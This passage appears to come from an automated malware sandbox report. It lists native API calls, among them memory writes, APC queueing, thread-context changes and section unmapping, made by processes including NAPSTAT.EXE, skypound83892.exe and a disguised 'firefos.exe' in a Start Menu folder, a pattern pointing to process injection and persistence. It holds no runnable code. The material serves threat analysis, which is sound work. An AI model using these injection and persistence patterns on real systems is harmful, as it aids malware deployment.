          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02141930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02140C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02141D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001381C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00138270 NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001382F0 NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001383A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001381BB NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013826B NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_001382EA NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013839D NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B632E NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B6332 NtCreateSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C2 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004181C0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00418270 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004182F0 NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004181BB NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041826B NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_004182EA NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041839D NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009410D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009400C4 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940048 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940078 NtResumeThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009401D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F900 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FBB8 NtQueryInformationToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC90 NtUnmapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00940C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FC60 NtMapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00941D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FD8C NtDelayExecution,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FEA0 NtReadVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FFB4 NtCreateSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0093FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B00C4 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0048 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0078 NtResumeThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF900 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AF938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFBB8 NtQueryInformationToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC90 NtUnmapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B0C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFC60 NtMapViewOfSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFD8C NtDelayExecution,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008B1D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFEA0 NtReadVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFFB4 NtCreateSection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008AFF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00401030
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041BA02
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00408C60
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041B4A3
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041CD3A
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00402D87
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00402D90
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041BFCC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094E0C6
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0097D005
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0096905A
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00953040
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009CD06D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DD13F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094E2E9
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F1238
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F63BF
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009763DB
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094F3CF
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00952305
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00957353
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0099A37B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00985485
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00961489
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D443E
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0098D47D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F35DA
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0096C5F0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D05E3
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095351F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00996540
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00954680
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095E6C1
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0099A634
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F2622
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D579A
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095C7BC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009857C3
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009CF8C4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009EF8EE
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095C85C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0097286D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F098E
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009529B2
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009669FE
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009E49F5
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D5955
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D394B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00A03A83
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009FCBA4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094FBD7
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DDBDA
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009D6BCB
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00977B00
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009F2C9C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DAC5E
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009EFDDD
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00980D3B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0095CD5B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00982E2F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0096EE4C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009ECFB1
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009C2FDC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009DBF14
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00960F3F
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0097DF7C
          Source: C:\Windows\explorer.exeCode function: 7_2_0292B8F9
          Source: C:\Windows\explorer.exeCode function: 7_2_0292E2FF
          Source: C:\Windows\explorer.exeCode function: 7_2_02930062
          Source: C:\Windows\explorer.exeCode function: 7_2_029325B2
          Source: C:\Windows\explorer.exeCode function: 7_2_029317C7
          Source: C:\Windows\explorer.exeCode function: 7_2_0292B902
          Source: C:\Windows\explorer.exeCode function: 7_2_0292E302
          Source: C:\Windows\explorer.exeCode function: 7_2_0292C362
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F1238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214E2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02152305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02157353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0219A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F63BF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021763DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214F3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0217D005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02153040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021CD06D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214E0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0219A634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F2622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02154680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215E6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215C7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021857C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D443E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0218D47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02185485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02161489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02196540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216C5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D05E3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02203A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02177B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021FCBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0214FBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021DDBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D6BCB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215C85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0217286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021CF8C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021EF8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D5955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021D394B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021F098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021529B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021669FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02182E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0216EE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02160F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0217DF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021ECFB1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021C2FDC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02180D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0215CD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021EFDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00128C60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0013CD3A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00122D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00122D87
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00122FB0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B67C7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B5062
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B32FF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B3302
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B1362
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B75B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B08F9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_008B0902
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00401030
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041BA02
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00408C60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041B4A3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041CD3A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00402D87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00402D90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0041BFCC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094E0C6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097D005
